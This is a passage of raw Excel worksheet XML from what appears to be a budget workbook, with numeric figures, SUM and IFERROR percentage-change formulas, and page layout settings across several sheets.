      <c r="A5" s="562" t="s">
        <v>880</v>
      </c>
      <c r="B5" s="563"/>
      <c r="C5" s="564"/>
      <c r="D5" s="565"/>
    </row>
    <row r="6" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A6" s="566" t="s">
        <v>881</v>
      </c>
      <c r="B6" s="567"/>
      <c r="C6" s="568"/>
      <c r="D6" s="432"/>
    </row>
    <row r="7" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A7" s="566" t="s">
        <v>882</v>
      </c>
      <c r="B7" s="567">
        <v>119340</v>
      </c>
      <c r="C7" s="568">
        <v>160000</v>
      </c>
      <c r="D7" s="432">
        <f t="shared" ref="D7:D11" si="0">IFERROR((C7-B7)/B7,"-")*100</f>
        <v>34.0707223060164</v>
      </c>
    </row>
    <row r="8" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A8" s="566" t="s">
        <v>883</v>
      </c>
      <c r="B8" s="567"/>
      <c r="C8" s="568"/>
      <c r="D8" s="432"/>
    </row>
    <row r="9" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A9" s="566" t="s">
        <v>884</v>
      </c>
      <c r="B9" s="567">
        <v>1476</v>
      </c>
      <c r="C9" s="568">
        <v>1400</v>
      </c>
      <c r="D9" s="432">
        <f t="shared" si="0"/>
        <v>-5.14905149051491</v>
      </c>
    </row>
    <row r="10" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A10" s="569" t="s">
        <v>885</v>
      </c>
      <c r="B10" s="567">
        <v>6306</v>
      </c>
      <c r="C10" s="568">
        <v>10000</v>
      </c>
      <c r="D10" s="432">
        <f t="shared" si="0"/>
        <v>58.5791309863622</v>
      </c>
    </row>
    <row r="11" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A11" s="566" t="s">
        <v>886</v>
      </c>
      <c r="B11" s="567">
        <v>2036</v>
      </c>
      <c r="C11" s="568">
        <v>2000</v>
      </c>
      <c r="D11" s="432">
        <f t="shared" si="0"/>
        <v>-1.76817288801572</v>
      </c>
    </row>
    <row r="12" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A12" s="566" t="s">
        <v>887</v>
      </c>
      <c r="B12" s="567"/>
      <c r="C12" s="568"/>
      <c r="D12" s="432"/>
    </row>
    <row r="13" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A13" s="569" t="s">
        <v>888</v>
      </c>
      <c r="B13" s="567">
        <v>11663</v>
      </c>
      <c r="C13" s="568">
        <v>11000</v>
      </c>
      <c r="D13" s="432">
        <f t="shared" ref="D13:D19" si="1">IFERROR((C13-B13)/B13,"-")*100</f>
        <v>-5.68464374517706</v>
      </c>
    </row>
    <row r="14" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A14" s="570" t="s">
        <v>889</v>
      </c>
      <c r="B14" s="571">
        <f>SUM(B5:B13)</f>
        <v>140821</v>
      </c>
      <c r="C14" s="571">
        <f>SUM(C5:C13)</f>
        <v>184400</v>
      </c>
      <c r="D14" s="438">
        <f t="shared" si="1"/>
        <v>30.946378736126</v>
      </c>
    </row>
    <row r="15" s="550" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A15" s="572" t="s">
        <v>743</v>
      </c>
      <c r="B15" s="573">
        <f>B16+B17</f>
        <v>199500</v>
      </c>
      <c r="C15" s="573">
        <f>C16+C17</f>
        <v>176398</v>
      </c>
      <c r="D15" s="432">
        <f t="shared" si="1"/>
        <v>-11.5799498746867</v>
      </c>
    </row>
    <row r="16" s="550" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A16" s="574" t="s">
        <v>744</v>
      </c>
      <c r="B16" s="567">
        <v>140500</v>
      </c>
      <c r="C16" s="568">
        <v>100000</v>
      </c>
      <c r="D16" s="432">
        <f t="shared" si="1"/>
        <v>-28.8256227758007</v>
      </c>
    </row>
    <row r="17" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A17" s="574" t="s">
        <v>745</v>
      </c>
      <c r="B17" s="567">
        <v>59000</v>
      </c>
      <c r="C17" s="568">
        <v>76398</v>
      </c>
      <c r="D17" s="432">
        <f t="shared" si="1"/>
        <v>29.4881355932203</v>
      </c>
    </row>
    <row r="18" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A18" s="566" t="s">
        <v>746</v>
      </c>
      <c r="B18" s="567">
        <f>SUM(B19:B22)</f>
        <v>76966</v>
      </c>
      <c r="C18" s="567">
        <f>SUM(C19:C22)</f>
        <v>131619</v>
      </c>
      <c r="D18" s="432">
        <f t="shared" si="1"/>
        <v>71.0092768235325</v>
      </c>
    </row>
    <row r="19" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A19" s="574" t="s">
        <v>747</v>
      </c>
      <c r="B19" s="567">
        <v>8549</v>
      </c>
      <c r="C19" s="568">
        <v>5000</v>
      </c>
      <c r="D19" s="432">
        <f t="shared" si="1"/>
        <v>-41.5136273248333</v>
      </c>
    </row>
    <row r="20" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A20" s="574" t="s">
        <v>669</v>
      </c>
      <c r="B20" s="567"/>
      <c r="C20" s="568"/>
      <c r="D20" s="432"/>
    </row>
    <row r="21" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A21" s="574" t="s">
        <v>748</v>
      </c>
      <c r="B21" s="567"/>
      <c r="C21" s="568"/>
      <c r="D21" s="432"/>
    </row>
    <row r="22" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A22" s="574" t="s">
        <v>749</v>
      </c>
      <c r="B22" s="567">
        <v>68417</v>
      </c>
      <c r="C22" s="568">
        <v>126619</v>
      </c>
      <c r="D22" s="432">
        <f>IFERROR((C22-B22)/B22,"-")*100</f>
        <v>85.0695002704006</v>
      </c>
    </row>
    <row r="23" s="550" customFormat="1" ht="27.95" customHeight="1" spans="1:6">
      <c r="A23" s="575" t="s">
        <v>750</v>
      </c>
      <c r="B23" s="576">
        <f>B14+B15+B18</f>
        <v>417287</v>
      </c>
      <c r="C23" s="576">
        <f>C14+C15+C18</f>
        <v>492417</v>
      </c>
      <c r="D23" s="577">
        <f>IFERROR((C23-B23)/B23,"-")*100</f>
        <v>18.0043950566397</v>
      </c>
      <c r="F23" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:D2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.590277777777778" right="0.590277777777778" top="0.790972222222222" bottom="0.790972222222222" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D34"/>
  <sheetViews>
    <sheetView showZeros="0" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B18" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A28" sqref="A28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.84259259259259" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="63.0925925925926" style="518" customWidth="1"/>
    <col min="2" max="3" width="16.7222222222222" style="518" customWidth="1"/>
    <col min="4" max="4" width="14.2777777777778" style="519" customWidth="1"/>
    <col min="5" max="16384" width="9.84259259259259" style="518"/>
  </cols>
  <sheetData>
    <row r="1" s="509" customFormat="1" ht="21.75" customHeight="1" spans="1:4">
      <c r="A1" s="520" t="s">
        <v>2144</v>
      </c>
      <c r="B1" s="521"/>
      <c r="C1" s="521"/>
      <c r="D1" s="522"/>
    </row>
    <row r="2" s="510" customFormat="1" ht="44" customHeight="1" spans="1:4">
      <c r="A2" s="523" t="s">
        <v>2145</v>
      </c>
      <c r="B2" s="523"/>
      <c r="C2" s="523"/>
      <c r="D2" s="523"/>
    </row>
    <row r="3" s="511" customFormat="1" ht="21" customHeight="1" spans="1:4">
      <c r="A3" s="524"/>
      <c r="B3" s="525"/>
      <c r="C3" s="526" t="s">
        <v>373</v>
      </c>
      <c r="D3" s="526"/>
    </row>
    <row r="4" s="512" customFormat="1" ht="39" customHeight="1" spans="1:4">
      <c r="A4" s="527" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="383" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="528" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="529" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" s="513" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A5" s="530" t="s">
        <v>2146</v>
      </c>
      <c r="B5" s="531">
        <v>8</v>
      </c>
      <c r="C5" s="531">
        <f>SUM(C6:C7)</f>
        <v>0</v>
      </c>
      <c r="D5" s="532"/>
    </row>
    <row r="6" s="513" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A6" s="530" t="s">
        <v>893</v>
      </c>
      <c r="B6" s="531">
        <v>8</v>
      </c>
      <c r="C6" s="531"/>
      <c r="D6" s="532"/>
    </row>
    <row r="7" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A7" s="530" t="s">
        <v>755</v>
      </c>
      <c r="B7" s="531"/>
      <c r="C7" s="531"/>
      <c r="D7" s="532"/>
    </row>
    <row r="8" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A8" s="533" t="s">
        <v>894</v>
      </c>
      <c r="B8" s="531">
        <f>SUM(B9:B16)</f>
        <v>105032</v>
      </c>
      <c r="C8" s="534">
        <f>SUM(C9:C16)</f>
        <v>168143</v>
      </c>
      <c r="D8" s="532">
        <f t="shared" ref="D8:D12" si="0">IFERROR((C8-B8)/B8,"-")*100</f>
        <v>60.0874019346485</v>
      </c>
    </row>
    <row r="9" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A9" s="533" t="s">
        <v>761</v>
      </c>
      <c r="B9" s="531">
        <v>83050</v>
      </c>
      <c r="C9" s="531">
        <v>100000</v>
      </c>
      <c r="D9" s="532">
        <f t="shared" si="0"/>
        <v>20.4093919325707</v>
      </c>
    </row>
    <row r="10" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A10" s="533" t="s">
        <v>895</v>
      </c>
      <c r="B10" s="534"/>
      <c r="C10" s="535"/>
      <c r="D10" s="532"/>
    </row>
    <row r="11" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A11" s="530" t="s">
        <v>896</v>
      </c>
      <c r="B11" s="534">
        <v>6306</v>
      </c>
      <c r="C11" s="535">
        <v>10000</v>
      </c>
      <c r="D11" s="532">
        <f t="shared" si="0"/>
        <v>58.5791309863622</v>
      </c>
    </row>
    <row r="12" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A12" s="530" t="s">
        <v>897</v>
      </c>
      <c r="B12" s="534">
        <v>2036</v>
      </c>
      <c r="C12" s="535">
        <v>2000</v>
      </c>
      <c r="D12" s="532">
        <f t="shared" si="0"/>
        <v>-1.76817288801572</v>
      </c>
    </row>
    <row r="13" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A13" s="530" t="s">
        <v>766</v>
      </c>
      <c r="B13" s="534"/>
      <c r="C13" s="535"/>
      <c r="D13" s="532"/>
    </row>
    <row r="14" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A14" s="530" t="s">
        <v>767</v>
      </c>
      <c r="B14" s="534">
        <v>1600</v>
      </c>
      <c r="C14" s="535">
        <v>8300</v>
      </c>
      <c r="D14" s="532">
        <f>IFERROR((C14-B14)/B14,"-")*100</f>
        <v>418.75</v>
      </c>
    </row>
    <row r="15" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A15" s="530" t="s">
        <v>898</v>
      </c>
      <c r="B15" s="534">
        <v>11890</v>
      </c>
      <c r="C15" s="535">
        <v>44410</v>
      </c>
      <c r="D15" s="532">
        <f>IFERROR((C15-B15)/B15,"-")*100</f>
        <v>273.507148864592</v>
      </c>
    </row>
    <row r="16" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A16" s="530" t="s">
        <v>899</v>
      </c>
      <c r="B16" s="534">
        <v>150</v>
      </c>
      <c r="C16" s="535">
        <v>3433</v>
      </c>
      <c r="D16" s="532">
        <f>IFERROR((C16-B16)/B16,"-")*100</f>
        <v>2188.66666666667</v>
      </c>
    </row>
    <row r="17" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A17" s="530" t="s">
        <v>900</v>
      </c>
      <c r="B17" s="534">
        <v>1089</v>
      </c>
      <c r="C17" s="535">
        <v>800</v>
      </c>
      <c r="D17" s="532">
        <f>IFERROR((C17-B17)/B17,"-")*100</f>
        <v>-26.5381083562902</v>
      </c>
    </row>
    <row r="18" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A18" s="530" t="s">
        <v>901</v>
      </c>
      <c r="B18" s="534"/>
      <c r="C18" s="535"/>
      <c r="D18" s="532"/>
    </row>
    <row r="19" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A19" s="530" t="s">
        <v>902</v>
      </c>
      <c r="B19" s="534">
        <v>2913</v>
      </c>
      <c r="C19" s="535">
        <v>2000</v>
      </c>
      <c r="D19" s="532">
        <f t="shared" ref="D17:D23" si="1">IFERROR((C19-B19)/B19,"-")*100</f>
        <v>-31.3422588396842</v>
      </c>
    </row>
    <row r="20" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A20" s="530" t="s">
        <v>903</v>
      </c>
      <c r="B20" s="534">
        <f>B21+B22</f>
        <v>73473</v>
      </c>
      <c r="C20" s="534">
        <f>C21+C22</f>
        <v>169110</v>
      </c>
      <c r="D20" s="532">
        <f t="shared" si="1"/>
        <v>130.166183495978</v>
      </c>
    </row>
    <row r="21" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A21" s="530" t="s">
        <v>580</v>
      </c>
      <c r="B21" s="534">
        <v>71420</v>
      </c>
      <c r="C21" s="535">
        <v>167710</v>
      </c>
      <c r="D21" s="532">
        <f t="shared" si="1"/>
        <v>134.822178661439</v>
      </c>
    </row>
    <row r="22" s="515" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A22" s="530" t="s">
        <v>582</v>
      </c>
      <c r="B22" s="534">
        <v>2053</v>
      </c>
      <c r="C22" s="535">
        <v>1400</v>
      </c>
      <c r="D22" s="532">
        <f t="shared" si="1"/>
        <v>-31.8071115440818</v>
      </c>
    </row>
    <row r="23" s="516" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A23" s="530" t="s">
        <v>904</v>
      </c>
      <c r="B23" s="534">
        <v>23695</v>
      </c>
      <c r="C23" s="535">
        <v>27960</v>
      </c>
      <c r="D23" s="532">
        <f t="shared" si="1"/>
        <v>17.9995779700359</v>
      </c>
    </row>
    <row r="24" s="515" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A24" s="530" t="s">
        <v>905</v>
      </c>
      <c r="B24" s="534"/>
      <c r="C24" s="535"/>
      <c r="D24" s="532"/>
    </row>
    <row r="25" s="515" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A25" s="536" t="s">
        <v>774</v>
      </c>
      <c r="B25" s="537">
        <f>B5+B8+B17+B18+B19+B20+B23+B24</f>
        <v>206210</v>
      </c>
      <c r="C25" s="537">
        <f>C5+C8+C17+C18+C19+C20+C23+C24</f>
        <v>368013</v>
      </c>
      <c r="D25" s="538">
        <f t="shared" ref="D25:D34" si="2">IFERROR((C25-B25)/B25,"-")*100</f>
        <v>78.4651568789099</v>
      </c>
    </row>
    <row r="26" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A26" s="530" t="s">
        <v>2147</v>
      </c>
      <c r="B26" s="534">
        <f>B27+B28</f>
        <v>59000</v>
      </c>
      <c r="C26" s="534">
        <f>C27+C28</f>
        <v>78220</v>
      </c>
      <c r="D26" s="532">
        <f t="shared" si="2"/>
        <v>32.5762711864407</v>
      </c>
    </row>
    <row r="27" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A27" s="539" t="s">
        <v>2148</v>
      </c>
      <c r="B27" s="534"/>
      <c r="C27" s="535">
        <v>1822</v>
      </c>
      <c r="D27" s="532"/>
    </row>
    <row r="28" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A28" s="539" t="s">
        <v>2149</v>
      </c>
      <c r="B28" s="534">
        <v>59000</v>
      </c>
      <c r="C28" s="535">
        <v>76398</v>
      </c>
      <c r="D28" s="532">
        <f t="shared" si="2"/>
        <v>29.4881355932203</v>
      </c>
    </row>
    <row r="29" s="517" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A29" s="530" t="s">
        <v>778</v>
      </c>
      <c r="B29" s="534">
        <f>B30+B31+B32+B33</f>
        <v>152077</v>
      </c>
      <c r="C29" s="534">
        <f>C30+C31+C32+C33</f>
        <v>46184</v>
      </c>
      <c r="D29" s="532">
        <f t="shared" si="2"/>
        <v>-69.6311736817533</v>
      </c>
    </row>
    <row r="30" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A30" s="540" t="s">
        <v>779</v>
      </c>
      <c r="B30" s="541">
        <v>160</v>
      </c>
      <c r="C30" s="542">
        <v>160</v>
      </c>
      <c r="D30" s="532">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A31" s="540" t="s">
        <v>2150</v>
      </c>
      <c r="B31" s="541">
        <v>40</v>
      </c>
      <c r="C31" s="542"/>
      <c r="D31" s="532">
        <f t="shared" si="2"/>
        <v>-100</v>
      </c>
    </row>
    <row r="32" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A32" s="539" t="s">
        <v>2151</v>
      </c>
      <c r="B32" s="534">
        <v>25258</v>
      </c>
      <c r="C32" s="535">
        <v>46024</v>
      </c>
      <c r="D32" s="532">
        <f t="shared" si="2"/>
        <v>82.2155356718663</v>
      </c>
    </row>
    <row r="33" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A33" s="539" t="s">
        <v>2152</v>
      </c>
      <c r="B33" s="543">
        <v>126619</v>
      </c>
      <c r="C33" s="544"/>
      <c r="D33" s="532">
        <f t="shared" si="2"/>
        <v>-100</v>
      </c>
    </row>
    <row r="34" s="514" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A34" s="545" t="s">
        <v>2153</v>
      </c>
      <c r="B34" s="546">
        <f>B25+B26+B29</f>
        <v>417287</v>
      </c>
      <c r="C34" s="546">
        <f>C25+C26+C29</f>
        <v>492417</v>
      </c>
      <c r="D34" s="547">
        <f t="shared" si="2"/>
        <v>18.0043950566397</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C3:D3"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="whole" operator="between" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B6">
      <formula1>-10000000000</formula1>
      <formula2>10000000000</formula2>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.747916666666667" right="0.747916666666667" top="1.18055555555556" bottom="0.389583333333333" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" scale="87" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:F27"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="59.7222222222222" style="184" customWidth="1"/>
    <col min="2" max="2" width="23.7222222222222" style="184" customWidth="1"/>
    <col min="3" max="4" width="10" style="184"/>
    <col min="5" max="5" width="10.7222222222222" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:6">
      <c r="A1" s="489" t="s">
        <v>2154</v>
      </c>
      <c r="B1" s="490"/>
      <c r="C1" s="490"/>
      <c r="D1" s="490"/>
      <c r="E1" s="491"/>
      <c r="F1" s="491"/>
    </row>
    <row r="2" ht="63" customHeight="1" spans="1:6">
      <c r="A2" s="448" t="s">
        <v>2155</v>
      </c>
      <c r="B2" s="448"/>
      <c r="C2" s="492"/>
      <c r="D2" s="492"/>
      <c r="E2" s="493"/>
      <c r="F2" s="493"/>
    </row>
    <row r="3" ht="18.4" customHeight="1" spans="1:6">
      <c r="A3" s="494"/>
      <c r="B3" s="495" t="s">
        <v>373</v>
      </c>
      <c r="C3" s="496"/>
      <c r="D3" s="496"/>
      <c r="E3" s="497"/>
      <c r="F3" s="497"/>
    </row>
    <row r="4" ht="36" customHeight="1" spans="1:6">
      <c r="A4" s="498" t="s">
        <v>2067</v>
      </c>
      <c r="B4" s="498" t="s">
        <v>2156</v>
      </c>
      <c r="C4" s="499"/>
      <c r="D4" s="499"/>
      <c r="E4" s="499"/>
      <c r="F4" s="499"/>
    </row>
    <row r="5" ht="30.95" customHeight="1" spans="1:6">
      <c r="A5" s="500" t="s">
        <v>2109</v>
      </c>
      <c r="B5" s="414">
        <v>0</v>
      </c>
      <c r="C5" s="501"/>
      <c r="D5" s="501"/>
      <c r="E5" s="502"/>
      <c r="F5" s="503"/>
    </row>
    <row r="6" ht="39.95" customHeight="1" spans="1:6">
      <c r="A6" s="504" t="s">
        <v>2157</v>
      </c>
      <c r="B6" s="505">
        <v>0</v>
      </c>
      <c r="C6" s="501"/>
      <c r="D6" s="501"/>
      <c r="E6" s="501"/>
      <c r="F6" s="501"/>
    </row>
    <row r="7" ht="39.95" customHeight="1" spans="1:6">
      <c r="A7" s="504" t="s">
        <v>2158</v>
      </c>
      <c r="B7" s="505">
        <v>0</v>
      </c>
      <c r="C7" s="501"/>
      <c r="D7" s="501"/>
      <c r="E7" s="501"/>
      <c r="F7" s="501"/>
    </row>
    <row r="8" ht="39.95" customHeight="1" spans="1:6">
      <c r="A8" s="504" t="s">
        <v>2159</v>
      </c>
      <c r="B8" s="505">
        <v>0</v>
      </c>
      <c r="C8" s="501"/>
      <c r="D8" s="501"/>
      <c r="E8" s="501"/>
      <c r="F8" s="501"/>
    </row>
    <row r="9" ht="39.95" customHeight="1" spans="1:6">
      <c r="A9" s="504" t="s">
        <v>2160</v>
      </c>
      <c r="B9" s="505">
        <v>0</v>
      </c>
      <c r="C9" s="501"/>
      <c r="D9" s="501"/>
      <c r="E9" s="501"/>
      <c r="F9" s="501"/>
    </row>
    <row r="10" ht="39.95" customHeight="1" spans="1:6">
      <c r="A10" s="504" t="s">
        <v>2161</v>
      </c>
      <c r="B10" s="505">
        <v>0</v>
      </c>
      <c r="C10" s="501"/>
      <c r="D10" s="501"/>
      <c r="E10" s="501"/>
      <c r="F10" s="501"/>
    </row>
    <row r="11" ht="39.95" customHeight="1" spans="1:6">
      <c r="A11" s="504" t="s">
        <v>2162</v>
      </c>
      <c r="B11" s="505">
        <v>0</v>
      </c>
      <c r="C11" s="501"/>
      <c r="D11" s="501"/>
      <c r="E11" s="501"/>
      <c r="F11" s="501"/>
    </row>
    <row r="12" ht="39.95" customHeight="1" spans="1:6">
      <c r="A12" s="504" t="s">
        <v>2163</v>
      </c>
      <c r="B12" s="505">
        <v>0</v>
      </c>
      <c r="C12" s="501"/>
      <c r="D12" s="501"/>
      <c r="E12" s="501"/>
      <c r="F12" s="501"/>
    </row>
    <row r="13" ht="39.95" customHeight="1" spans="1:6">
      <c r="A13" s="504" t="s">
        <v>2164</v>
      </c>
      <c r="B13" s="505">
        <v>0</v>
      </c>
      <c r="C13" s="501"/>
      <c r="D13" s="501"/>
      <c r="E13" s="501"/>
      <c r="F13" s="501"/>
    </row>
    <row r="14" ht="39.95" customHeight="1" spans="1:6">
      <c r="A14" s="506" t="s">
        <v>2165</v>
      </c>
      <c r="B14" s="507">
        <v>0</v>
      </c>
      <c r="C14" s="501"/>
      <c r="D14" s="501"/>
      <c r="E14" s="501"/>
      <c r="F14" s="501"/>
    </row>
    <row r="15" ht="18.95" customHeight="1" spans="1:2">
      <c r="A15" s="184" t="s">
        <v>818</v>
      </c>
      <c r="B15" s="508"/>
    </row>
    <row r="16" spans="2:2">
      <c r="B16" s="508"/>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="508"/>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="508"/>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="508"/>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="508"/>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="508"/>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="508"/>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="508"/>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="508"/>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="508"/>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="508"/>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="508"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:R17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B24" sqref="B24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.72222222222222" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="46.2777777777778" style="184" customWidth="1"/>
    <col min="2" max="2" width="38.8425925925926" style="184" customWidth="1"/>
    <col min="3" max="15" width="9.72222222222222" style="184"/>
    <col min="16" max="16" width="10.5740740740741" style="184" customWidth="1"/>
    <col min="17" max="17" width="9.72222222222222" style="184"/>
    <col min="18" max="18" width="18.5740740740741" style="184" customWidth="1"/>
    <col min="19" max="16384" width="9.72222222222222" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:5">
      <c r="A1" s="471" t="s">
        <v>2166</v>
      </c>
      <c r="B1" s="472"/>
      <c r="C1" s="473"/>
      <c r="D1" s="473"/>
      <c r="E1" s="473"/>
    </row>
    <row r="2" ht="69" customHeight="1" spans="1:5">
      <c r="A2" s="448" t="s">
        <v>2167</v>
      </c>
      <c r="B2" s="474"/>
      <c r="C2" s="473"/>
      <c r="D2" s="473"/>
      <c r="E2" s="473"/>
    </row>
    <row r="3" ht="21.95" customHeight="1" spans="1:5">
      <c r="A3" s="475"/>
      <c r="B3" s="476" t="s">
        <v>373</v>
      </c>
      <c r="C3" s="473"/>
      <c r="D3" s="473"/>
      <c r="E3" s="473"/>
    </row>
    <row r="4" ht="32.65" customHeight="1" spans="1:5">
      <c r="A4" s="477" t="s">
        <v>2168</v>
      </c>
      <c r="B4" s="478" t="s">
        <v>2156</v>
      </c>
      <c r="C4" s="479"/>
      <c r="D4" s="480"/>
      <c r="E4" s="479"/>
    </row>
    <row r="5" ht="32.65" customHeight="1" spans="1:18">
      <c r="A5" s="481" t="s">
        <v>705</v>
      </c>
      <c r="B5" s="482">
        <v>0</v>
      </c>
      <c r="C5" s="483"/>
      <c r="D5" s="480"/>
      <c r="E5" s="483"/>
      <c r="F5" s="483"/>
      <c r="G5" s="483"/>
      <c r="H5" s="483"/>
      <c r="I5" s="483"/>
      <c r="J5" s="483"/>
      <c r="K5" s="483"/>
      <c r="L5" s="483"/>
      <c r="M5" s="483"/>
      <c r="N5" s="483"/>
      <c r="O5" s="483"/>
      <c r="P5" s="483"/>
      <c r="Q5" s="483"/>
      <c r="R5" s="483"/>
    </row>
    <row r="6" ht="32.65" customHeight="1" spans="1:17">
      <c r="A6" s="484" t="s">
        <v>706</v>
      </c>
      <c r="B6" s="485">
        <v>0</v>
      </c>
      <c r="C6" s="486"/>
      <c r="D6" s="480"/>
      <c r="E6" s="486"/>
      <c r="F6" s="486"/>
      <c r="G6" s="486"/>
      <c r="H6" s="486"/>
      <c r="I6" s="486"/>
      <c r="J6" s="486"/>
      <c r="K6" s="486"/>
      <c r="L6" s="486"/>
      <c r="M6" s="486"/>
      <c r="N6" s="486"/>
      <c r="O6" s="486"/>
      <c r="P6" s="486"/>
      <c r="Q6" s="486"/>
    </row>
    <row r="7" ht="32.65" customHeight="1" spans="1:17">
      <c r="A7" s="484" t="s">
        <v>707</v>
      </c>
      <c r="B7" s="485">
        <v>0</v>
      </c>
      <c r="C7" s="486"/>
      <c r="D7" s="480"/>
      <c r="E7" s="486"/>
